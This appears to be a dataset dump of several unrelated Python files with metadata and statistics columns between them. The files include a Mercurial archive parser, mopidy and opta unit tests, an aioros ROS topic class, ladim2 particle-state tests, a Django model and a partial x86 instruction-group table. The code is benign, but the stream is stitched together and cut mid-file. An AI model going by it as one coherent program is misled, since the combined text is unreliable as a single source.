case, we can fetch relevant build information from this file that we might normally be able to get directly from hg. Parameters: attr (string): The archive attr to fetch. One of "repo"|"node"|"branch"|"latesttag"|"latesttagdistance"|"changessincelatesttag" archive_path (string): The path to the mercurial archive. The .hg_archival.txt file must exist right inside this directory. Returns: A dict of the attributes within the .hg_archival file. Raises: IOError when the .hg_archival.txt file cannot be found. KeyError when `attr` is not in .hg_archival.txt """ archival_filepath = os.path.join(archive_path, '.hg_archival.txt') attributes = {} with open(archival_filepath) as archival_file: for line in archival_file: attr_name, value = line.strip().split(': ') # Try to cast the attribute to an int (since it might be a # revision number). If it doesn't cast, leave it as a string. try: value = int(value) except ValueError: pass attributes[attr_name] = value return attributes
32.195266
86
0.609355
1,360
10,882
4.675735
0.188971
0.039786
0.020758
0.028306
0.301462
0.19437
0.142947
0.126435
0.089322
0.077685
0
0.002355
0.297647
10,882
337
87
32.290801
0.829648
0.231299
0
0.37156
0
0
0.09464
0.019593
0
0
0
0
0.009174
1
0.16055
false
0.004587
0.027523
0.027523
0.417431
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd0adc5de287fb179800281e8709f5913da7913
878
py
Python
tests/utils/init_test.py
swinton/mopidy
c32c73f5112c29ef7ccccf36a508c571adb39759
[ "Apache-2.0" ]
null
null
null
tests/utils/init_test.py
swinton/mopidy
c32c73f5112c29ef7ccccf36a508c571adb39759
[ "Apache-2.0" ]
null
null
null
tests/utils/init_test.py
swinton/mopidy
c32c73f5112c29ef7ccccf36a508c571adb39759
[ "Apache-2.0" ]
null
null
null
from mopidy import utils from tests import unittest class GetClassTest(unittest.TestCase): def test_loading_module_that_does_not_exist(self): with self.assertRaises(ImportError): utils.get_class('foo.bar.Baz') def test_loading_class_that_does_not_exist(self): with self.assertRaises(ImportError): utils.get_class('unittest.FooBarBaz') def test_loading_incorrect_class_path(self): with self.assertRaises(ImportError): utils.get_class('foobarbaz') def test_import_error_message_contains_complete_class_path(self): try: utils.get_class('foo.bar.Baz') except ImportError as e: self.assertIn('foo.bar.Baz', str(e)) def test_loading_existing_class(self): cls = utils.get_class('unittest.TestCase') self.assertEqual(cls.__name__, 'TestCase')
31.357143
69
0.6959
109
878
5.284404
0.385321
0.060764
0.112847
0.125
0.359375
0.359375
0.305556
0.305556
0.222222
0.222222
0
0
0.210706
878
27
70
32.518519
0.831169
0
0
0.25
0
0
0.096811
0
0
0
0
0
0.25
1
0.25
false
0
0.35
0
0.65
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
bdd18a04d17e95c0953ca2e0c3d8db5c195b7e67
1,054
py
Python
src/two_level_aspect_entity_embedding_generation/clusterd_knowledge_graph_statistics.py
mainuliitkgp/AR-BERT
d6d5e8542a3a1c76edac49cec9e99ebda6395725
[ "MIT" ]
4
2022-03-06T17:41:57.000Z
2022-03-22T08:42:58.000Z
src/two_level_aspect_entity_embedding_generation/clusterd_knowledge_graph_statistics.py
mainuliitkgp/AR-BERT
d6d5e8542a3a1c76edac49cec9e99ebda6395725
[ "MIT" ]
null
null
null
src/two_level_aspect_entity_embedding_generation/clusterd_knowledge_graph_statistics.py
mainuliitkgp/AR-BERT
d6d5e8542a3a1c76edac49cec9e99ebda6395725
[ "MIT" ]
1
2022-03-19T14:04:42.000Z
2022-03-19T14:04:42.000Z
from __future__ import print_function import numpy as np import random import json import sys import os import networkx as nx from networkx.readwrite import json_graph version_info = list(map(int, nx.__version__.split('.'))) major = version_info[0] minor = version_info[1] assert (major <= 1) and (minor <= 11), "networkx major version > 1.11" if __name__ == "__main__": graph_file = sys.argv[1] #out_file = sys.argv[2] G_data = json.load(open(graph_file)) #print(G_data) G = json_graph.node_link_graph(G_data) nodes = [n for n in G.nodes() if not G.node[n]["val"] and not G.node[n]["test"]] G = G.subgraph(nodes) count = 0 max_node_degree = 0 for count, node in enumerate(nodes): if G.degree(node) == 0: continue else : count += G.degree(node) if G.degree(node)>max_node_degree: max_node_degree = G.degree(node) avg_node_degree = count/len(nodes) print(len(nodes), avg_node_degree, max_node_degree) print(nx.is_connected(G))
28.486486
84
0.651803
164
1,054
3.926829
0.365854
0.093168
0.080745
0.02795
0.071429
0
0
0
0
0
0
0.01599
0.228653
1,054
36
85
29.277778
0.776138
0.033207
0
0
0
0
0.044248
0
0
0
0
0
0.033333
1
0
false
0
0.266667
0
0.266667
0.1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd1f5712640c660f6739b854770d7e695f1c4d4
8,167
py
Python
src/aioros/tcpros/topic.py
mgrrx/aioros
9bd750020d0d5fb466891346f61b6f083cbb8f05
[ "Apache-2.0" ]
8
2020-08-27T17:16:59.000Z
2022-02-02T13:39:41.000Z
src/aioros/tcpros/topic.py
mgrrx/aioros
9bd750020d0d5fb466891346f61b6f083cbb8f05
[ "Apache-2.0" ]
3
2022-02-09T19:18:12.000Z
2022-03-08T21:12:00.000Z
src/aioros/tcpros/topic.py
mgrrx/aioros
9bd750020d0d5fb466891346f61b6f083cbb8f05
[ "Apache-2.0" ]
null
null
null
from asyncio import AbstractEventLoop from asyncio import iscoroutinefunction from asyncio import Event from asyncio import IncompleteReadError from asyncio import Queue from asyncio import open_connection from asyncio import open_unix_connection from typing import Dict from typing import List from typing import Set from typing import Tuple from typing import Type from genpy import Message from ..api.node_api_client import NodeApiClient from .protocol import Serializer from .protocol import encode_header from .protocol import read_data from .protocol import read_header from .publisher import Publisher from .subscription import Subscription class SubscriberInitError(Exception): pass class Topic: def __init__( self, loop: AbstractEventLoop, node_name: str, topic_name: str, msg_type: Type[Message] ) -> None: self._loop = loop self._node_name = node_name self._topic_name = topic_name self._msg_type = msg_type self._connected_subscribers: Dict[str, Queue] = {} self._connected_publishers: Dict[str, Event] = {} self._has_connected_subscribers: Event = Event() self._has_connected_publishers: Event = Event() self._internal_subscriptions: Set[Subscription] = set() self._internal_publishers: Set[Publisher] = set() self._latched_msgs: Dict[Publisher, bytes] = {} self._serializer: Serializer = Serializer() @property def name(self) -> str: return self._topic_name @property def type(self) -> Type[Message]: return self._msg_type @property def type_name(self) -> str: return self._msg_type._type @property def md5sum(self) -> str: return self._msg_type._md5sum @property def nr_connected_subscribers(self) -> int: return len(self._connected_subscribers) @property def nr_connected_publishers(self) -> int: return len(self._connected_publishers) async def wait_for_connected_subscribers(self) -> None: await self._has_connected_subscribers.wait() async def wait_for_connected_publishers(self) -> None: await self._has_connected_publishers.wait() @property def has_subscriptions(self) -> bool: return bool(self._internal_subscriptions) @property def has_publishers(self) -> bool: return bool(self._internal_publishers) @property def is_latching(self) -> bool: return any(pub.latch for pub in self._internal_publishers) def get_publisher_header(self) -> Dict[str, str]: return dict( topic=self.name, type=self.type_name, latching='1' if self.is_latching else '0', message_definition=self.type._full_text, md5sum=self.md5sum, callerid=self._node_name) def register_publisher( self, publisher: Publisher ) -> None: self._internal_publishers.add(publisher) async def unregister_publisher( self, publisher: Publisher ) -> bool: self._latched_msgs.pop(publisher, None) self._internal_publishers.discard(publisher) return self.has_publishers def register_subscription( self, subscription: Subscription ) -> None: self._internal_subscriptions.add(subscription) async def unregister_subscription( self, subscription: Subscription ) -> bool: self._internal_subscriptions.discard(subscription) if not self.has_subscriptions: for event in self._connected_publishers.values(): event.set() return self.has_subscriptions def publish( self, publisher: Publisher, msg: Message ) -> None: if not self._connected_subscribers and not self.is_latching: return with self._serializer.serialize(msg) as serialized_msg: for queue in self._connected_subscribers.values(): queue.put_nowait(serialized_msg) if publisher.latch: self._latched_msgs[publisher] = serialized_msg async def connect_subscriber( self, node_name: str, queue: Queue ) -> None: for publisher in self._internal_publishers: if publisher.on_peer_connect: msg = publisher.on_peer_connect(node_name) if msg: with self._serializer.serialize(msg) as serialized_msg: await queue.put(serialized_msg) serialized_msg = self._latched_msgs.get(publisher) if serialized_msg is not None: await queue.put(serialized_msg) self._connected_subscribers[node_name] = queue self._has_connected_subscribers.set() def disconnect_subscriber( self, node_name: str ) -> None: for publisher in self._internal_publishers: if publisher.on_peer_disconnect: publisher.on_peer_disconnect(node_name) del self._connected_subscribers[node_name] if not self._connected_subscribers: self._has_connected_subscribers.clear() def connect_to_publishers( self, publishers: List[str] ) -> None: publishers_set = set(publishers) for publisher_uri in publishers: if publisher_uri in self._connected_publishers: continue self._connected_publishers[publisher_uri] = Event() self._loop.create_task( self._subscribe(publisher_uri)) for publisher_uri in self._connected_publishers: if publisher_uri not in publishers_set: self._connected_publishers[publisher_uri].set() async def _subscribe( self, publisher_uri: str ) -> None: connection_params = await self._get_publisher_connection_params( publisher_uri) try: if connection_params[0] == 'UNIXROS': reader, writer = await open_unix_connection( connection_params[1]) elif connection_params[0] == 'TCPROS': reader, writer = await open_connection( connection_params[1], int(connection_params[2])) header = dict( topic=self.name, message_definition=self.type._full_text, tcp_nodelay='1', md5sum=self.md5sum, type=self.type_name, callerid=self._node_name) writer.write(encode_header(header)) await writer.drain() header_dict = await read_header(reader) if 'error' in header_dict: raise SubscriberInitError(header_dict['error']) self._has_connected_publishers.set() while not self._connected_publishers[publisher_uri].is_set(): msg = self.type() msg.deserialize(await read_data(reader)) for sub in self._internal_subscriptions: if iscoroutinefunction(sub.callback): self._loop.create_task(sub.callback(msg)) else: self._loop.call_soon(sub.callback, msg) except (ConnectionResetError, IncompleteReadError): pass finally: writer.close() if hasattr(writer, 'wait_closed'): await writer.wait_closed() self._connected_publishers.pop(publisher_uri) if not self._connected_publishers: self._has_connected_publishers.clear() async def _get_publisher_connection_params( self, publisher_uri: str ) -> Tuple[str, int]: client = NodeApiClient(self._node_name, publisher_uri) topic = await client.request_topic( self.name, [['UNIXROS'], ['TCPROS']]) await client.close() if topic[0] not in ('UNIXROS', 'TCPROS'): raise ValueError('protocol is not supported') return topic
32.40873
75
0.628872
869
8,167
5.628308
0.156502
0.045185
0.047025
0.022081
0.212635
0.116132
0.041709
0.041709
0.023308
0.023308
0
0.002609
0.29607
8,167
251
76
32.537849
0.848148
0
0
0.260465
0
0
0.010775
0
0
0
0
0
0
1
0.074419
false
0.009302
0.093023
0.046512
0.24186
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd325e14189de11da8187eeb203eba8b96feec5
1,911
py
Python
tests/core/test_local.py
riddopic/opta
25fa6435fdc7e2ea9c7963ed74100fffb0743063
[ "Apache-2.0" ]
595
2021-05-21T22:30:48.000Z
2022-03-31T15:40:25.000Z
tests/core/test_local.py
riddopic/opta
25fa6435fdc7e2ea9c7963ed74100fffb0743063
[ "Apache-2.0" ]
463
2021-05-24T21:32:59.000Z
2022-03-31T17:12:33.000Z
tests/core/test_local.py
riddopic/opta
25fa6435fdc7e2ea9c7963ed74100fffb0743063
[ "Apache-2.0" ]
29
2021-05-21T22:27:52.000Z
2022-03-28T16:43:45.000Z
import json import os import unittest from opta.core.local import Local from opta.layer import Layer class LocalTests(unittest.TestCase): def setUp(self) -> None: self.layer = Layer( name="testname", org_name="testorg", providers={"local": {"path": "/tmp"}}, modules_data=[], path="/tmp", parent=None, ) self.local = Local(self.layer) self.local.tf_file = "/tmp/tfconfig" self.local.config_file_path = "/tmp/localconfig" with open(self.local.config_file_path, "w") as f: json.dump( { "opta_version": "dev", "date": "2021-11-15T18:26:47.553097", "original_spec": "", "defaults": {}, }, f, ) with open(self.local.tf_file, "w") as f: f.write("Some tf state for testing") return super().setUp() def tearDown(self) -> None: if os.path.isfile("/tmp/localconfig"): os.remove("/tmp/localconfig") if os.path.isfile("/tmp/tfconfig"): os.remove("/tmp/tfconfig") return super().tearDown() def test_get_remote_config(self) -> None: assert self.local.get_remote_config() == { "opta_version": "dev", "date": "2021-11-15T18:26:47.553097", "original_spec": "", "defaults": {}, } def test_upload_opta_config(self) -> None: self.local.upload_opta_config() dict = json.load(open(self.local.config_file_path, "r")) assert set(dict.keys()) == set( ["opta_version", "original_spec", "date", "defaults"] ) def test_delete_remote_state(self) -> None: self.local.delete_remote_state() assert os.path.isfile(self.local.tf_file) is False
30.333333
65
0.529042
214
1,911
4.574766
0.341122
0.091931
0.036772
0.045965
0.233912
0.175689
0.120531
0.120531
0.120531
0.120531
0
0.031177
0.328624
1,911
62
66
30.822581
0.731878
0
0
0.150943
0
0
0.165358
0.027211
0
0
0
0
0.056604
1
0.09434
false
0
0.09434
0
0.245283
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdd3722beee7f3a9735cf08fa0cf57f708146d63
132
py
Python
train/antpush/environments/ant_maze_env.py
MIMUW-RL/spp-rl
86b96cdd220cc4eae86f7cfd26924c69b498dcc6
[ "MIT" ]
7
2020-06-15T12:25:53.000Z
2021-11-03T01:08:47.000Z
train/antpush/environments/ant_maze_env.py
MIMUW-RL/spp-rl
86b96cdd220cc4eae86f7cfd26924c69b498dcc6
[ "MIT" ]
null
null
null
train/antpush/environments/ant_maze_env.py
MIMUW-RL/spp-rl
86b96cdd220cc4eae86f7cfd26924c69b498dcc6
[ "MIT" ]
1
2020-12-21T11:21:22.000Z
2020-12-21T11:21:22.000Z
from environments.maze_env import MazeEnv from environments.ant import AntEnv class AntMazeEnv(MazeEnv): MODEL_CLASS = AntEnv
18.857143
41
0.810606
17
132
6.176471
0.647059
0.304762
0
0
0
0
0
0
0
0
0
0
0.143939
132
6
42
22
0.929204
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
5
bdd3ab9d894a791877cd5b110bbcf4db48bff423
7,943
py
Python
test/test_state.py
bjornaa/ladim2
f6c1be9028ca54370ce33dde25b005d5b0bb4677
[ "MIT" ]
null
null
null
test/test_state.py
bjornaa/ladim2
f6c1be9028ca54370ce33dde25b005d5b0bb4677
[ "MIT" ]
null
null
null
test/test_state.py
bjornaa/ladim2
f6c1be9028ca54370ce33dde25b005d5b0bb4677
[ "MIT" ]
null
null
null
import numpy as np # type: ignore import pytest from ladim2.state import State # ------------ # __init__ # ------------ def test_init_minimal(): """Init State with no arguments""" S = State() assert len(S) == 0 assert S.npid == 0 assert set(S.variables) == {"pid", "X", "Y", "Z", "active", "alive"} assert S.instance_variables == {"pid", "X", "Y", "Z", "active", "alive"} assert S.particle_variables == set() assert S.pid.dtype == int assert all(S.pid == []) assert S.X.dtype == np.float64 assert all(S.variables["X"] == []) assert all(S["X"] == []) assert all(S.X == []) assert S.Y.dtype == float assert S.Z.dtype == "f8" assert S.alive.dtype == bool assert S.default_values["alive"] def test_init_args(): """Init State with extra variables""" S = State( instance_variables=dict(age=float, stage=int), particle_variables=dict(release_time="time"), default_values=dict(age=0, stage=1), ) assert "age" in S.instance_variables assert S.age.dtype == float assert S.default_values["age"] == 0 assert S.stage.dtype == int assert S.particle_variables == {"release_time"} assert S.release_time.dtype == np.dtype("M8[s]") assert S.dtypes["release_time"] == np.dtype("M8[s]") assert all(S.release_time == np.array([], np.datetime64)) def test_override_mandatory(): S = State(instance_variables=dict(X="f4")) assert S.X.dtype == np.float32 def test_set_default_err1(): """Trying to set default for an undefined variable""" with pytest.raises(ValueError): State(particle_variables={"age": float}, default_values=dict(length=4.3)) def test_set_default_err2(): """Trying to set default for pid""" with pytest.raises(ValueError): S = State(default_values=dict(pid=42)) def test_set_default_err3(): """Trying to set an array as default value""" with pytest.raises(TypeError): S = State( instance_variables=dict(length=float), default_values=dict(length=[1.2, 4.3]), ) # -------------------- # append # -------------------- def test_append_scalar(): state = State() state.append(X=200, Z=5, Y=100) assert len(state) == 1 assert state.npid == 1 assert np.all(state.pid == [0]) assert np.all(state.active == [True]) assert np.all(state.alive == [True]) assert np.all(state.X == [200]) def test_append_array(): """Append an array to a non-empty state""" state = State() state.append(X=200, Z=5, Y=100) length = len(state) npid = state.npid state.append(X=np.array([201, 202]), Y=110, Z=[5, 10]) assert len(state) == length + 2 assert state.npid == npid + 2 assert np.all(state.pid == [0, 1, 2]) assert np.all(state["pid"] == [0, 1, 2]) assert np.all(state.variables["pid"] == [0, 1, 2]) assert np.all(state.active == 3 * [True]) assert np.all(state.alive == 3 * [True]) assert np.all(state.X == [200, 201.0, 202.0]) assert np.all(state["X"] == [200, 201.0, 202.0]) assert np.all(state.variables["X"] == [200, 201.0, 202.0]) assert np.all(state.Y == [100.0, 110.0, 110.0]) assert np.all(state.Z == [5.0, 5.0, 10.0]) def test_extra_instance_variables(): """Append with extra instance variables, with and without default""" state = State( instance_variables=dict(age=float, stage="int"), default_values=dict(stage=1) ) assert len(state) == 0 assert state.age.dtype == float assert state.stage.dtype == int state.append(X=[1, 2], Y=2, Z=3, age=0) assert len(state) == 2 assert all(state.age == [0, 0]) assert all(state.stage == [1, 1]) def test_append_nonvariable(): """Append an undefined variable""" state = State() with pytest.raises(ValueError): state.append(X=1, Y=2, Z=3, length=20) def test_append_missing_variable(): state = State() # with pytest.raises(TypeError): # Now Y becomes NaN, correct behaviour?? state.append(X=100, Z=10) assert state.Y[0] != state.Y[0] def test_append_missing_particle_variable(): state = State(particle_variables=dict(X_start=float)) # with pytest.raises(TypeError): state.append(X=100, Y=200, Z=5) assert state.X_start[0] != state.X_start[0] def test_append_shape_mismatch(): state = State() with pytest.raises(ValueError): state.append(X=[100, 101], Y=[200, 201, 202], Z=5) def test_missing_default(): state = State( instance_variables=dict(age=float, stage=int), default_values=dict(age=0) ) # No default for stage # with pytest.raises(TypeError): # state.append(X=1, Y=2, Z=3) # changed behaviour: now check for NaN state.append(X=1, Y=2, Z=3) assert state.stage[0] != state.stage[0] def test_not_append_pid(): """Can not append to pid""" S = State() with pytest.raises(ValueError): S.append(X=10, Y=20, Z=5, pid=101) # ---------------- # Update # ---------------- def test_variable_update(): """Update a variable, low level""" S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) S.variables["X"] += 1 assert all(S.variables["X"] == [101, 111]) def test_update_item(): """Item style variable update is OK""" S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) S["X"] += 1 assert all(S.variables["X"] == [101, 111]) def test_update_attr(): """Attribute style assignment to variables is not allowed""" S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) with pytest.raises(AttributeError): S.X += 1 def test_update_error_not_variable(): S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) with pytest.raises(KeyError): S["Lon"] = [4.5, 4.6] def test_update_error_wrong_size(): # Alternative broadcast the scalar, equivalent to s["X"] = [110, 100] S = State() S.append(X=[100, 110], Y=[200, 210], Z=5) with pytest.raises(KeyError): S["X"] = 110 with pytest.raises(KeyError): S["X"] = [101, 111, 121] # -------------- # Compactify # -------------- def test_compactify(): S = State(default_values=dict(Z=5)) S.append(X=[10, 11], Y=[1, 2]) assert len(S) == 2 S.append(X=[21, 22], Y=[3, 4]) assert len(S) == 4 # Kill second particle S.alive[1] = False S.compactify() assert len(S) == 3 assert S.npid == 4 assert np.all(S.active) assert np.all(S.alive) assert np.all(S.pid == [0, 2, 3]) assert np.all(S.X == [10, 21, 22]) # The arrays should be contiguous after removing an element assert S.X.flags["C_CONTIGUOUS"] def test_not_compactify_particle_variables(): S = State(particle_variables=dict(X0=float), default_values=dict(Z=5)) X0 = [10, 11, 12, 13] Y0 = [20, 21, 22, 23] S.append(X=X0, Y=Y0, X0=X0) S.alive[1] = False S.compactify() assert len(S) == 3 assert all(S.pid == [0, 2, 3]) assert all(S.X == [10, 12, 13]) # particle_variable X0 is not compactified assert all(S.X0 == X0) def test_update_and_append_and_compactify(): """Check that updating bug has been fixed""" S = State() # One particle S.append(X=100, Y=10, Z=5) assert all(S.pid == [0]) assert all(S.X == [100]) # Update position S["X"] += 1 assert all(S.pid == [0]) assert all(S.X == [101]) # Update first particle and add two new particles S["X"] += 1 S.append(X=np.array([200, 300]), Y=np.array([20, 30]), Z=5) assert all(S.pid == [0, 1, 2]) assert all(S.X == [102, 200, 300]) # Update particle positions and kill the first particle, pid=0 S["X"] = S["X"] + 1.0 S["alive"][0] = False S.compactify() assert all(S.pid == [1, 2]) assert all(S.X == [201, 301]) # Update positions S["X"] = S["X"] + 1 assert all(S.pid == [1, 2]) assert all(S.X == [202, 302])
27.675958
85
0.590583
1,216
7,943
3.775493
0.14227
0.02091
0.043563
0.048791
0.418427
0.312786
0.272925
0.241124
0.218689
0.172511
0
0.067487
0.222082
7,943
286
86
27.772727
0.675514
0.154727
0
0.258065
0
0
0.020393
0
0
0
0
0
0.408602
1
0.123656
false
0
0.016129
0
0.139785
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
bdd4db2e43df9f7b67e7a41de13b7d8d81ab3b7c
220
py
Python
mysite/myinviteapi/models.py
datha88/rest-api-sample-friend-invite
1880837f4831c2d867a5a4ac1a176953838fab0d
[ "MIT" ]
null
null
null
mysite/myinviteapi/models.py
datha88/rest-api-sample-friend-invite
1880837f4831c2d867a5a4ac1a176953838fab0d
[ "MIT" ]
null
null
null
mysite/myinviteapi/models.py
datha88/rest-api-sample-friend-invite
1880837f4831c2d867a5a4ac1a176953838fab0d
[ "MIT" ]
null
null
null
from django.db import models # Create your models here. class Friend(models.Model): name = models.CharField(max_length=60) email = models.CharField(max_length=60) def __str__(self): return self.name
24.444444
43
0.713636
31
220
4.870968
0.677419
0.198676
0.238411
0.317881
0.344371
0
0
0
0
0
0
0.022472
0.190909
220
8
44
27.5
0.825843
0.109091
0
0
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0.166667
0.166667
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
5
bdd62727280cef056fc775786f12ebffe8812748
28,253
py
Python
tiknib/feature/asm_const.py
SoftSec-KAIST/tiknib
5f1e25df0ff652cf35574dae3e6a3cfb3b163e63
[ "MIT" ]
null
null
null
tiknib/feature/asm_const.py
SoftSec-KAIST/tiknib
5f1e25df0ff652cf35574dae3e6a3cfb3b163e63
[ "MIT" ]
null
null
null
tiknib/feature/asm_const.py
SoftSec-KAIST/tiknib
5f1e25df0ff652cf35574dae3e6a3cfb3b163e63
[ "MIT" ]
null
null
null
from tiknib.feature.asm_ppc import PPC_GRP_MAP # ==================== x86 32 ============================================= # data transfer X86_GRP_DTRANSFER = [ # general purpose instructions "CMOV", "CMOVA", "CMOVAE", "CMOVB", "CMOVBE", "CMOVC", "CMOVE", "CMOVG", "CMOVGE", "CMOVL", "CMOVLE", "CMOVNA", "CMOVNAE", "CMOVNB", "CMOVNBE", "CMOVNC", "CMOVNE", "CMOVNG", "CMOVNGE", "CMOVNL", "CMOVNLE", "CMOVNO", "CMOVNP", "CMOVNS", "CMOVNZ", "CMOVO", "CMOVP", "CMOVPE", "CMOVPO", "CMOVS", "CMOVZ", "BSWAP", "XCHG", "XADD", "CMPXCHG", "CMPXCHG8B", "POP", "POPA", "POPAD", "PUSH", "PUSHA", "PUSHAD", "CDQ", "CDQE", "CBW", "CWD", "CWDE", "MOV", "MOVD", "MOVQ", "MOVABS", "MOVSX", "MOVSXD", "MOVZX", "MOVZXD", # string "MOVS", "MOVSB", "MOVSD", "MOVSW", "STOS", "STOSB", "STOSD", "STOSW", "LODS", "LODSB", "LODSD", "LODSW", # segment register "LDS", "LES", "LFS", "LGS", "LSS", # user mode extended "XSAVE", "XSAVEC", "XSAVEOPT", "XRSTOR", "XGETBV", "XSETBV", # BMI1, BMI2 "BEXTR", "BLSI", "PDEP", "PEXT", # MMX "PACKSSDW", "PACKSSWB", "PACKUSDW", "PACKUSWB", "PUNPCKHBW", "PUNPCKHDQ", "PUNPCKHWD", "PUNPCKLBW", "PUNPCKLDQ", "PUNPCKLWD", "EMMS", # SSE 64-bit integer "PMOVMSKB", "PSHUFW", # SSE2 128-bit integer "MOVDQA", "MOVDQU", "MOVQ2DQ", "MOVDQ2Q", "PSHUFLW", "PSHUFHW", "PSHUFD", "PUNPCKLQDQ", "PUNPCKHQDQ", # SSSE2 "PSHUFB", "PALIGNR", # SSE4 "MOVNTDQA", "PBLENDVB", "PBLENDW", "PINSRB", "PINSRD", "PINSRQ", "PEXTRB", "PEXTRW", "PEXTRD", "PEXTRQ", "PMOVSXBW", "PMOVZXBW", "PMOVSXBD", "PMOVZXBD", "PMOVSXWD", "PMOVZXWD", "PMOVSXBQ", "PMOVZXBQ", "PMOVSXWQ", "PMOVZXWQ", "PMOVSXDQ", "PMOVZXDQ", "PACKUSDW", "LGDT", "SGDT", "LLDT", "SLDT", "LTR", "STR", "LIDT", "SIDT", "MOV", "LMSW", "SMSW", "CLTS", "LSL", "LAR", "VERR", "VERW", # 64-bit "CDQE", "CQO", ] X86_GRP_FLOAT_DTRANSFER = [ # floating point instrutions "FLD", "FST", "FSTP", "FILD", "FIST", "FISTP", "FBLD", "FBSTP", "FXCH", "FCMOVB", "FCMOVBE", "FCMOVE", "FCMOVNB", "FCMOVNBE", "FCMOVNE", "FCMOVNU", "FCMOVU", # floating point load const instructions "FLD1", "FLDZ", "FLDPI", "FLDL2E", "FLDLN2", "FLDL2T", "FLDLG2", # FPU register related "FCLEX", "FFREE", "FINIT", "FLDCW", "FLDENV", "FNCLEX", "FNINIT", "FNOP", "FNSAVE", "FNSTCW", "FNSTENV", "FNSTSW", "FRSTOR", "FSAVE", "FSTCW", "FSTENV", "FSTSW", # SSE "MOVAPS", "MOVUPS", "MOVHPS", "MOVHLPS", "MOVLPS", "MOVLHPS", "MOVMSKPS", "MOVSS", # SSE2 "MOVAPD", "MOVUPD", "MOVHPD", "MOVHLPD", "MOVLPD", "MOVLHPD", "MOVMSKPD", "MOVSD", # SSE Shuffle "SHUFPS", "UNPCKHPS", "UNPCKLPS", # SSE2 shuffle "SHUFPD", "UNPCKHPD", "UNPCKLPD", # SSE Conversion "CVTPI2PS", "CVTSI2SS", "CVTPS2PI", "CVTTPS2PI", "CVTSS2SI", "CVTTSS2SI", # SSE2 Conversion "CVTPD2PI", "CVTTPD2PI", "CVTPI2PD", "CVTPD2DQ", "CVTTPD2DQ", "CVTDQ2PD", "CVTPS2PD", "CVTPD2PS", "CVTSS2SD", "CVTSD2SS", "CVTSD2SI", "CVTTSD2SI", "CVTSI2SD", "CVTDQ2PS", "CVTPS2DQ", "CVTTPS2DQ", # SSE MXCSR State "LDMXCSR", "STMXCSR", # SSE 64-bit "PEXTRW", "PINSRW", # SSE cache "MASKMOVQ", "MOVNTQ", "MOVNTPS", "PREFETCH", "SFENCE", # SSE3 "FISTTP", "LDDQU", "MOVSHDUP", "MOVSLDUP", "MOVDDUP", # SSE4 "BLENDPD", "BLENDPS", "BLENDVPD", "BLENDVPS", "EXTRACTPS", "INSERTPS", # 16-bit FP "VCVTPS2PH", "VCVTPS2PH", # Vector "VALIGN", "VBLEND", "VCOMPRESS", "VEXTRACT", "VINSERT", "VMOV", "VFIXUP", "VGET", "VEXPAND", "VCVT", "VPBLEND", "VPBROAD", "VPCOMPRESS", "VPERM" "VPEXPAND" "VPMOV", "VPSCATTER", "VSCATTER", "VSHUF", ] # - Miscellaneous Instructions: X86_GRP_MISC = [ "NOP", "UD", "UD2", "LEA", "XLAT", "XLATB", "CPUID", "MOVBE", "PREFETCHW", "PREFETCHWT1", "CLFLUSH", "CLFLUSHOPT", # SSE2 cache "CLFLUSH", "LFENCE", "MFENCE", "MASKMOVDQU", "MOVNTPD", "MOVNTDQ", "MOVNTI", ] X86_GRP_ARITH = [ # general purpose binary arithmetic instructions "ADCX", "ADOX", "ADC", "ADD", "XADD", "SUB", "SBB", "IMUL", "MUL", "IDIV", "DIV", "INC", "DEC", "NEG", "CMP", # decimal arithmetic instructions "DAA", "DAS", "AAA", "AAS", "AAM", "AAD", # flag "STC", "CLC", "CMC", "CLD", "STD", # BMI1, BMI2 "MULX", # MMX "PADD", "PADDB", "PADDW", "PADDD", "PADDSB", "PADDSW", "PADDUSB", "PADDUSW", "PSUB", "PSUBB", "PSUBW", "PSUBD", "PSUBSB", "PSUBSW", "PSUBUSB", "PSUBUSW", "PMULHW", "PMULLW", "PMADDWD", # SSE 64bit integer "PAVGB", "PAVGW", "PMAXUB", "PMAXSB", "PMINUB", "PMINSB", "PMULHUW", "PSADBW", # SSE 128-bit integer "PMULUDQ", "PADDQ", "PSUBQ", # SSSE3 "PHADDW", "PHADDSW", "PHADDD", "PHSUBW", "PHSUBSW", "PHSUBD", "PABSB", "PABSW", "PABSD", "PABSQ", "PMADDUBSW", "PMULHRSW", "PSIGNB", "PSIGNW", "PSIGND", # SSE4 "PMULLD", "PMULDQ", "PMINUW", "PMINUD", "PMINSB", "PMINSD", "PMAXUW", "PMAXUD", "PMAXSB", "PMAXSD", "ROUNDPS", "ROUNDPD", "ROUNDSS", "ROUNDSD", "PMPSADBW", # AESNI "AESDEC", "AESDECLAST", "AESENC", "AESENCLAST", "AESIMC", "AESKEYGENASSIST", "PCLMULQDQ", # SHA1 "SHA1MSG1", "SHA1MSG2", "SHA1NEXTE", "SHA1RNDS4", "SHA256MSG1", "SHA256MSG2", "SHA256RNDS2", "CRC32", # BMI1, BMI2 "BLSMSK", "BLSR", "CLAC", "STAC", 